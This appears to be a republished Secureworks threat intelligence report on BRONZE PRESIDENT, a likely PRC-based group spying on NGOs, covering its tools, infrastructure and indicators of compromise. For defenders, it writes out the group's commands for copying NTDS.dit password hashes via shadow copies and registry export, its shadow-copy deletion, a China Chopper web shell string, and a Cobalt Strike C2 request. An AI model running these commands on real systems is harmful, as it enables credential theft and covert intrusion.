BRONZE PRESIDENT Targets NGOs

Threats & Defenses

Summary

The activities of some non-governmental organizations (NGOs) challenge governments on politically sensitive issues such as social, humanitarian, and environmental policies. As a result, these organizations are often exposed to increased government-directed threats aimed at monitoring their activities, discrediting their work, or stealing their intellectual property. BRONZE PRESIDENT is a likely People’s Republic of China (PRC)-based targeted cyberespionage group that uses both proprietary and publicly available tools to target NGO networks. Secureworks® Counter Threat Unit™ (CTU) researchers have observed BRONZE PRESIDENT activity since mid-2018 but identified artifacts suggesting that the threat actors may have been conducting network intrusions as far back as 2014.

CTU™ researchers divided the threat intelligence about this threat group into two sections: strategic and tactical. Executives can use the strategic assessment of the ongoing threat to determine how to reduce risk to their organization’s mission and critical assets. Computer network defenders can use the tactical information gathered from incident response investigations and research to reduce the time and effort associated with responding to the threat group’s activities.

Key points

  • The BRONZE PRESIDENT cyberespionage group targets NGOs, as well as political and law enforcement organizations in countries in South and East Asia.
  • The threat group appears to have developed its own remote access tools that it uses alongside publicly available remote access and post-compromise toolsets.
  • After compromising a network, the threat actors elevate their privileges and install malware on a large proportion of systems. The group runs custom batch scripts to collect specific file types and takes proactive steps to minimize detection of its activities.

Strategic threat intelligence

Analysis of a threat group’s targeting, origin, and competencies can determine which organizations could be at risk. This information can help organizations make strategic defensive decisions in relation to the BRONZE PRESIDENT threat group.

Intent

CTU researchers have observed BRONZE PRESIDENT targeting multiple NGOs. The threat actors steal data from compromised systems over a long period of time, which likely indicates a long-term objective of monitoring the target’s network. BRONZE PRESIDENT uses custom batch scripts to collect either specific file types (including files with .pptx, .xlsx, .pdf extensions) or all files within a specific location. CTU researchers also observed evidence that the threat actors collect credentials from high-privilege network accounts and reputationally sensitive accounts, such as social media and webmail accounts.

Additionally, CTU researchers have observed evidence of BRONZE PRESIDENT targeting political and law enforcement organizations in countries adjacent to the PRC, including Mongolia and India. Some of the group’s phishing lures suggest an interest in national security, humanitarian, and law enforcement organizations in the East, South, and Southeast Asia (see Figure 1). These examples reveal BRONZE PRESIDENT’s likely intent to conduct political espionage in other countries in addition to targeting NGOs.


Figure 1. August 2019 phishing lure referencing Mongolian national security topics. (Source: Secureworks)

Attribution

It is highly likely that BRONZE PRESIDENT is based in the PRC due to the following observations:

  • The NGOs targeted by BRONZE PRESIDENT conduct research on issues relevant to the PRC.
  • Strong evidence links BRONZE PRESIDENT’s infrastructure to entities within the PRC.
  • There are connections between a subset of the group’s operational infrastructure and PRC-based Internet service providers.
  • Tools such as PlugX have historically been leveraged by threat groups operating in the PRC.

It is likely that BRONZE PRESIDENT is sponsored or at least tolerated by the PRC government. The threat group’s systemic long-term targeting of NGO and political networks does not align with patriotic or criminal threat groups.

Capability

BRONZE PRESIDENT has deployed a variety of remote access tools. The use of tools not previously observed by CTU researchers suggests that the group could have access to malware development capabilities. BRONZE PRESIDENT also uses widely available or modified open-source tools, which could be a strategic effort to reduce the risk of attribution or to minimize the need for tool development resources. Following a network compromise, the threat actors typically delete their tools and processes. However, the group is content leaving some malware on the network, likely to provide a contingency if other access channels are removed. When the group’s activities were detected in one incident, it had elevated privileges and had maintained access to the targeted environment for several months. This finding indicates the group’s effectiveness at maintaining long-term access to a targeted network.

Tactical threat intelligence

Incident response engagements have given CTU researchers insight into the threat group’s tools and tactics.

Tools

CTU researchers and Secureworks incident responders have observed BRONZE PRESIDENT using the following tools, along with several custom batch scripts for locating and archiving specific file types:

  • Cobalt Strike — This popular and commercially available penetration tool gains shell access to an infected system. It allows threat actors to execute additional tools and perform post-intrusion actions on compromised systems. Cobalt Strike appears to be one of BRONZE PRESIDENT’s preferred remote access tools. During one intrusion, the threat actors installed it on over 70% of accessible hosts. The group’s Cobalt Strike installation typically uses a payload named svchost.exe in an attempt to disguise Cobalt Strike activity as the legitimate Windows svchost.exe executable.
  • PlugX — This remote access trojan (RAT) is popular among PRC-based targeted threat groups. Its functionality includes uploading and downloading files, and it has configurable network protocols. BRONZE PRESIDENT installs PlugX using DLL side-loading. In June and August 2019, BRONZE PRESIDENT delivered PlugX via government and law enforcement-themed phishing lures.
  • ORat — CTU researchers have only observed this basic loader tool in the context of BRONZE PRESIDENT intrusions. ORat is the name assigned by the malware author, as denoted by the program debug database string in the analyzed sample: D:vsworkPluginORatbuildReleaseORatServerLoader.pdb. The tool uses the Windows Management Instrumentation (WMI) event consumer for persistence by installing a script to the system’s WMI registry. Messages sent from ORat to its command and control (C2) server start with the string “VIEWS0018x”. If the data received from the C2 server starts with the same string, then the remainder of the payload is decompressed using ORat’s “deflate” algorithm and called as a function. ORat acts as a flexible loader tool rather than a fully featured remote access tool.
  • RCSession — This basic RAT is installed via DLL side-loading, and CTU researchers observed BRONZE PRESIDENT installing it on multiple hosts during intrusions. RCSession was extracted from a file called English.rtf and launched via a hollowed svchost.exe process. RCSession connects to its C2 server via a custom protocol, can remotely execute commands, and can launch additional tools. CTU researchers have no evidence of other threat actors using RCSession or of wide proliferation of the tool, suggesting it may be exclusively used by BRONZE PRESIDENT.
  • Nbtscan — This publicly available command-line tool scans systems for NetBIOS name information (see Figure 2). In an example observed by CTU researchers, the Nbtscan executable was named Adobe.exe and was installed in several working directories on compromised hosts, including: C:Recovery.

    Figure 2. Nbtscan being used via RCSession to scan an internal IP range. (Source: Secureworks)
  • Nmap — BRONZE PRESIDENT used this freely available network scanning tool from the C:PerfLogs folder.
  • Wmiexec — This publicly available tool uses WMI to create SYSTEM-level shells on remote hosts.

Links to other malware

While analyzing hosts compromised by BRONZE PRESIDENT, CTU researchers identified other malware artifacts. Although there was no evidence of the group using the malware, the threat actors may have leveraged its access or capabilities during earlier phases of the intrusions. The BRONZE PRESIDENT intrusions observed by CTU researchers appear to have taken place over several months or years.

China Chopper web shell files named error404.aspx included the “eval(Request.Item[“|”],”unsafe”);” string. To successfully interact with the web shell, a threat actor sent HTTP requests that included the “|” parameter. The web shell files appeared to be installed during the timeframe that BRONZE PRESIDENT was active on the system (see Figure 3).


Figure 3. Timeline of malicious tool use on a compromised host. (Source: Secureworks)

CTU researchers identified a variety of post-compromise tools stored under %AppData% (e.g., AppDataRoamingTemp) on several compromised systems. The widespread proliferation and use of the following tools suggest that the group likely has the knowledge and capability to use them as part of its operations:

  • Powerview.ps1 — This PowerShell-based module for network reconnaissance is part of the PowerSploit penetration testing framework.
  • PVE Find AD User — This command-line tool identifies login locations of Active Directory (AD) users.
  • AdFind — This command-line tool conducts AD queries.
  • NetSess — This publicly available tool enumerates NetBIOS sessions.
  • Netview — This tool enumerates networks.
  • TeamViewer — This remote control and desktop-sharing tool has applications for legitimate and malicious system users. Its installation in a temporary directory alongside network reconnaissance and enumeration tools likely indicates malicious intent.

Initial access and working directories

At the time of detection, observed BRONZE PRESIDENT incidents had likely been ongoing for several months or even years. As a result, CTU researchers were unable to ascertain the initial access vector. In October 2019, third-party researchers described a phishing campaign that used C2 infrastructure that CTU researchers attribute to BRONZE PRESIDENT. This connection suggests that the group uses phishing emails with ZIP attachments that contain LNK files as an initial access vector.

During one intrusion, the threat actors gained administrator access to all systems within a targeted business unit and installed their remote access tools on 80% of the hosts. The group installed multiple tools within the environment, including three different tools on a strategically important server, likely to provide contingency access options (see Table 1).

HOST Cobalt Strike RCSession ORat
Host 1 (Server) X X X
Host 2 (User PC) X    
Host 3 (User PC) X X  
Host 4 (User PC)   X  
Host 5 (User PC)   X  
Host 6 (User PC) X X  
Host 7 (User PC) X    

Table 1. Remote access tools identified on infected hosts during a BRONZE PRESIDENT intrusion.

BRONZE PRESIDENT used multiple directories to install tools on compromised hosts (see Table 2).

Directory Associated tool
C:RECYCLER ORat
C:WindowsHelpHelp Cobalt Strike
C:WindowsdebugWIA Cobalt Strike
C:WindowsLogsDPX Cobalt Strike
C:PerfLogs RCSession
C:Recovery Nbtscan

Table 2. Directories used by BRONZE PRESIDENT to execute or store tools.

Network enumeration, lateral movement, and credential access

During multiple intrusions, the threat actors employed various tools and techniques to understand the network environments. For example, they used Nmap to scan various internal IP address ranges and SMB ports (see Figure 4). They also relied on Nbtscan, net user, and ping commands to obtain insights and identify opportunities for lateral movement.

Figure 4. Nmap network scanning tool use via RCSession. (Source: Secureworks)

BRONZE PRESIDENT regularly leverages Wmiexec to move laterally. During one intrusion, the threat actors extensively used this tool to execute WMI commands on remote hosts in the environment (see Figure 5).

Figure 5. Wmiexec used to execute commands on a targeted host. (Source: Secureworks)

They also frequently leverage net commands to connect to other hosts (see Figure 6) using compromised credentials collected during early phases of the intrusion.

Figure 6. BRONZE PRESIDENT Nbtscan use and net commands. (Source: Secureworks)

During one intrusion observed by CTU researchers, the group used the native vssadmin tool on a domain controller to create a volume shadow copy:

vssadmin create shadow /for=c:

The threat actors retrieved the NTDS.dit file from the volume shadow copy. NTDS.dit contains Active Directory data, including password hashes for all users on a domain. Extracting hashes from the NTDS.dit file requires access to the SYSTEM file in the system registry:

reg save hklmsystem c:windowstempsystem.hive

The threat actors saved both the SYSTEM file (system.hive) and NTDS.dit in the compromised host’s c:windowstemp directory. These files were likely exfiltrated and exploited offline to retrieve user password hashes, which could then be cracked or used to perform pass-the-hash attacks.

C2 communications and infrastructure

BRONZE PRESIDENT’s C2 techniques are dictated by its remote access tools. The group’s primary and likely proprietary RCSession RAT communicates with a hard-coded C2 server using a custom protocol over TCP port 443. After connecting to its C2 server, RCSession checks in with an encrypted beacon and then awaits instruction. The ORat tool, which appears to be used less frequently by the group, communicates over TCP port 80 using a raw socket protocol (not HTTP).

The Cobalt Strike tool has malleable C2 profiles. During one intrusion, it connected to multiple C2 domains on TCP port 80, including mail . svrchost . com, using the following request. Subsequent Cobalt Strike C2 servers included subdomains of svchosts . com, svrchost . com, and strust . club.

GET /Dv9i HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: mail . svrchost . com
Connection: Keep-Alive
Cache-Control: no-cache

Some BRONZE PRESIDENT C2 domains analyzed by CTU researchers were hosted on infrastructure owned by Dutch VPS provider Host Sailor, Hong Kong-based New World Telecoms, and Malaysia-based Shinjiru Technology (see Figure 7). The threat actors have used discrete infrastructure clusters that share matching hosting and registration characteristics. The pattern of infrastructure hosting suggests that the group parks its domains when not in use, an operational security technique that limits exposure of the group’s overall hosting infrastructure.


Figure 7. Hosting for a subset of BRONZE PRESIDENT C2 domains. (Source: Secureworks)

Persistence, defensive evasion, and exfiltration

Some of BRONZE PRESIDENT’s malware has persistence capabilities. For example, ORat uses a WMI event consumer to maintain its presence on a compromised host. The group also creates and maintains scheduled tasks to achieve this purpose. Figure 8 shows a Sysdriver scheduled task that periodically executes a Cobalt Strike payload.


Figure 8. BRONZE PRESIDENT scheduled task created for Cobalt Strike persistence. (Source: Secureworks)

The threat actors tend to install malware on a large proportion of hosts during their intrusions. However, the group exercises restraint and defensive evasion tactics to minimize opportunities for network defenders to detect or investigate its activities. For example, the threat actors deleted volume shadow copies after using them for NTDS.dit retrieval:

vssadmin delete shadows /for=c: /quiet

Likewise, the group demonstrated diligence by killing local and remote processes after they had been used:

BRONZE PRESIDENT targets specific data types. The threat actors use custom batch scripts to create a list of files with predefined criteria and collate the identified files into a .rar archive (see Figure 9). CTU researchers have observed BRONZE PRESIDENT batch scripts named doc.bat, xls.bat, xlsx.bat, ppt.bat, pptx.bat, pdf.bat, and txt.bat.



Figure 9. Batch script (pptx.bat) used to collate and archive all .pptx files in a defined location. (Source: Secureworks)

The group also uses the all.bat batch script to collect all files stored on a specific user’s desktop. CTU researchers observed RCSession and Cobalt Strike on systems that BRONZE PRESIDENT targeted for data theft. Either of these tools could have been used to exfiltrate the archived data.

Conclusion

BRONZE PRESIDENT has demonstrated intent to steal data from organizations using tools such as Cobalt Strike, PlugX, ORat, and RCSession. The concurrent use of so many tools during a single intrusion suggests that the group could include threat actors with distinct tactics, roles, and tool preferences. It is likely that BRONZE PRESIDENT has additional unobserved operational tools and capabilities. CTU researchers recommend that organizations apply controls to mitigate common intrusion techniques and behaviors along with controls that address the tools and techniques discussed in this analysis.

Threat indicators

The threat indicators in Table 3 are associated with BRONZE PRESIDENT threat campaigns. Note that IP addresses can be reallocated. The IP address and domains may contain malicious content, so consider the risks before opening them in a browser.

Indicator Type Context
ipsoftwarelabs.com Domain name PlugX C2 server
toshibadrive.com Domain name RCSession C2 server
strust.club Domain name ORat and Cobalt Strike C2 server
svchosts.com Domain name Cobalt Strike C2 server
svrhosts.com Domain name Cobalt Strike C2 server
116.93.154.250 IP address Cobalt Strike download location
forexdualsystem.com Domain name Used by BRONZE PRESIDENT to check a compromised system’s connectivity
apple-net.com Domain name Linked to BRONZE PRESIDENT domain (forexdualsystem . com)
lionforcesystems.com Domain name Linked to BRONZE PRESIDENT domain (forexdualsystem . com)
wbemsystem.com Domain name Linked to BRONZE PRESIDENT domain (forexdualsystem . com)
a0758535cf8eb689782b95d3791d23d5 MD5 hash ORat malware sample
774a9c3ff01a3e734b7bec0c312120126295fad9 SHA1 hash ORat malware sample
2e8762c984468ee309dad30a6c5f6d3308676ac721357da
442a8a5b9d9d65d82
SHA256 hash ORat malware sample
7101fff478290d4db8a1c11a8d3b40cb MD5 hash Cobalt Strike payload
4c81777551a772218519fb6dd1a6672aade4a936 SHA1 hash Cobalt Strike payload
bdf1452b55b9974f3e9a4aea4439769a02fd931660ed
655df92519a2a4df1261
SHA256 hash Cobalt Strike payload
5f626148bb2505f91f82da718487ca45 MD5 hash Cobalt Strike payload
c72cc22ad328946201b069cddae0eee021d687b1 SHA1 hash Cobalt Strike payload
cfa73718e16b499c34951cc5c857cd35bf263f94efa7e1
518cddf27766fb0d2f
SHA256 hash Cobalt Strike payload
dllhosts.exe Filename Cobalt Strike payload
0617cad9e5d559356c43d4037c86227f MD5 hash Modified DLL file (goopdate.dll) used by BRONZE PRESIDENT to install RCSession
f14eaf5d648aebb2ed7b00b2cf4349263b30fb1c SHA1 hash Modified DLL file (goopdate.dll) used by BRONZE PRESIDENT to install RCSession
2ea9ccf653f63bcc3549a313ec9d0bada341556
cc32dd2ca4b73e0c034492740
SHA256 hash Modified DLL file (goopdate.dll) used by BRONZE PRESIDENT to install RCSession
2433a0a2b1bfcbdccdca665cd758a6ad MD5 hash RCSession payload (English.rtf)
603babf64a62989bf00e124955471519f0d8e8ed SHA1 hash RCSession payload (English.rtf)
357943c55c7d6580dd7b91b832b6424403e9d
22b38c615ebac0990eb4cce104c
SHA256 hash RCSession payload (English.rtf)
3935da25054700d7b996f5f67de39492 MD5 hash Modified DLL file (goopdate.dll) used by BRONZE PRESIDENT to install RCSession
fcb799d02e6c1b4ac76ec8c5e704c7c511762d2d SHA1 hash Modified DLL file (goopdate.dll) used by BRONZE PRESIDENT to install RCSession
d0df97adc2a98c02c0adc407fd13040af972106c
2bb24726e963c63f7ab4634d
SHA256 hash Modified DLL file (goopdate.dll) used by BRONZE PRESIDENT to install RCSession
6f88260cbc97e60c03e9d91b7e4761a5 MD5 hash RCSession payload (English.rtf
ed8ad981c73ed444f1b89c4bda71ed99ca966c5a SHA1 hash RCSession payload (English.rtf)
41ca0ea774b3fdee2ac5b23c95aba0d
e6e24e261e71c26bf1d880932ba954e15
SHA256 hash RCSession payload (English.rtf)
NATIONAL SECURITY CONCEPT OF MONGOLIA.exe Filename ORat malware sample
0d3fbc842a430f5367d480dd1b74449b MD5 hash Associated with BRONZE PRESIDENT phishing lure delivering PlugX
bd2533005a2eaed203054fd649fdbdcd3e3a860a SHA1 hash Associated with BRONZE PRESIDENT phishing lure delivering PlugX
59aaa2b8116ba01c1b37937db37213ff1f4a855
2a7211ab21f73ffac2c0c13ce
SHA256 hash Associated with BRONZE PRESIDENT phishing lure delivering PlugX
DSR & CSR of Special Branch Sind.exe Filename Associated with BRONZE PRESIDENT phishing lure delivering PlugX
e5a23e8a2c0f98850b1a43b595c08e63 MD5 hash Associated with BRONZE PRESIDENT phishing lure delivering PlugX
9136eed34bea473d0f8554fb1d914502b832f219 SHA1 hash Associated with BRONZE PRESIDENT phishing lure delivering PlugX
918de40e8ba7e9c1ba555aa22c8acbfdf77f9
c050d5ddcd7bd0e3221195c876f
SHA256 hash Associated with BRONZE PRESIDENT phishing lure delivering PlugX
Daily News (19-8-2019)(Soft Copy).lnk Filename Associated with BRONZE PRESIDENT phishing lure delivering PlugX
5f094cb3b92524fced2731c57d305e78 MD5 hash Associated with BRONZE PRESIDENT phishing lure delivering PlugX
1a2f1c97a5883e8bb4edcdacfe176da98b266b42 SHA1 hash Associated with BRONZE PRESIDENT phishing lure delivering PlugX
fb3e3d9671bb733fcecd6900def15b9a6b4f36b
0a35bdc769b0a69bc5fb7e40d
SHA256 hash Associated with BRONZE PRESIDENT phishing lure delivering PlugX

Table 3. BRONZE PRESIDENT indicators.

Products You May Like

Articles You May Like

Why system resilience should mainly be the job of the OS, not just third-party applications
INTERPOL Arrests 8 in Major Phishing and Romance Fraud Crackdown in West Africa
New MedusaLocker Ransomware Variant Deployed by Threat Actor
Cyber Fraud Cost up to $37bn in Southeast Asia Last Year
The complexities of attack attribution – Week in security with Tony Anscombe

Leave a Reply

Your email address will not be published. Required fields are marked *